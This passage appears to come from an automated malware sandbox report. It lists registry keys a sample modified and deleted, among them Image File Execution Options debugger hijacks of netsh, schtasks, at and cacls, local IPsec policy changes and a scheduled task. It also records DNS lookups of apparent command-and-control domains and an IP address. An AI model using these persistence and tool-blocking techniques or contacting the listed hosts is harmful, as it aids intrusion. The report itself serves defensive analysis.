871 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Start",
872 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
873 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
874 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
875 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IKEEXT\\Type",
876 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IKEEXT\\Start",
877 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\cacls.exe",
878 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\cacls.exe\\Debugger",
879 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\DefaultConnectionSettings",
880 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\netsh.exe",
881 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\netsh.exe\\Debugger",
882 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\schtasks.exe",
883 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\schtasks.exe\\Debugger",
884 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\at.exe",
885 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\at.exe\\Debugger",
886 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
887 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
888 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
889 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
890 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
891 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
892 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
893 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
894 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
895 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
896 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
897 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
898 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
899 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
900 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
901 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
902 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
903 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607",
904 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\className",
905 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\name",
906 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\ipsecID",
907 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\ipsecDataType",
908 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\ipsecData",
909 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\whenChanged",
910 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff",
911 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\className",
912 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\name",
913 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecID",
914 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecNegotiationPolicyAction",
915 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecNegotiationPolicyType",
916 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecDataType",
917 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecData",
918 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\whenChanged",
919 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc",
920 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\className",
921 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\description",
922 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\name",
923 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecName",
924 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecID",
925 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecDataType",
926 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecData",
927 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecISAKMPReference",
928 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\whenChanged",
929 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\ipsecOwnersReference",
930 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a",
931 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\className",
932 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\name",
933 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\ipsecID",
934 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\ipsecDataType",
935 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\ipsecData",
936 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\ipsecNegotiationPolicyReference",
937 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\whenChanged",
938 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecNFAReference",
939 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\ipsecOwnersReference",
940 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecOwnersReference",
941 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c",
942 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\className",
943 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\name",
944 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecName",
945 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecID",
946 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecNegotiationPolicyAction",
947 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecNegotiationPolicyType",
948 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecDataType",
949 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecData",
950 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\whenChanged",
951 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\371C7AE0-E7B0-4535-8AD0-2D046DB26874\\Path",
952 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\371C7AE0-E7B0-4535-8AD0-2D046DB26874\\Hash",
953 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\ujqftiylp\\Id",
954 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\ujqftiylp\\Index",
955 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\371C7AE0-E7B0-4535-8AD0-2D046DB26874\\Triggers",
956 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\371C7AE0-E7B0-4535-8AD0-2D046DB26874\\DynamicInfo",
957 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
958 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\PreviousServiceShutdown",
959 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
960 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Auto Update\\UAS\\UpdateCount",
961 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa",
962 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\className",
963 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\name",
964 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\ipsecName",
965 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\ipsecID",
966 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\ipsecDataType",
967 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\ipsecData",
968 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\whenChanged",
969 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
970 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
971 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
972 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
973 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
974 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
975 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
976 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
977 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
978 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
979 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
980 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord",
981 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
982 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
983 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
984 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
985 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
986 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
987 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf",
988 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\className",
989 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\name",
990 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecName",
991 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecID",
992 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecDataType",
993 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecData",
994 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecNegotiationPolicyReference",
995 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecFilterReference",
996 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\whenChanged",
997 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecOwnersReference",
998 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\ipsecOwnersReference",
999 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecOwnersReference",
1000 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ActivePolicy",
1001 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\IPSec",
1002 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPSec\\OperationMode"
1003
1004
1005* Deleted Registry Keys:
1006 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\netsh.exe\\Debugger",
1007 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\description",
1008 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\description",
1009 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\description",
1010 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\ujqftiylp.job",
1011 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\ujqftiylp.job.fp",
1012 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
1013 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\description",
1014 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\description",
1015 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\ipsecOwnersReference",
1016 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ActivePolicy",
1017 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPSec\\OperationMode"
1018
1019
1020* DNS Communications:
1021
1022 "type": "A",
1023 "request": "aj.0x0x0x0x0.best",
1024 "answers":
1025
1026
1027 "type": "A",
1028 "request": "xs.0x0x0x0x0.club",
1029 "answers":
1030
1031
1032 "type": "A",
1033 "request": "ui.0x0x0x0x0.xyz",
1034 "answers":
1035
1036
1037 "type": "A",
1038 "request": "qb.1c1c1c1c.best",
1039 "answers":
1040
1041
1042 "type": "A",
1043 "request": "rp.oiwcvbnc2e.stream",
1044 "answers":
1045
1046
1047
1048* Domains:
1049
1050 "ip": "31.214.157.85",
1051 "domain": "xs.0x0x0x0x0.club"
1052
1053
1054 "ip": "",
1055 "domain": "rp.oiwcvbnc2e.stream"
1056
1057
1058 "ip": "",
1059 "domain": "aj.0x0x0x0x0.best"
1060
1061
1062 "ip": "31.214.157.85",
1063 "domain": "ui.0x0x0x0x0.xyz"
1064
1065
1066 "ip": "31.214.157.85",
1067 "domain": "qb.1c1c1c1c.best"
1068
1069
1070
1071* Network Communication - ICMP:
1072
1073* Network Communication - HTTP:
1074
1075* Network Communication - SMTP:
1076
1077* Network Communication - Hosts:
1078
1079* Network Communication - IRC: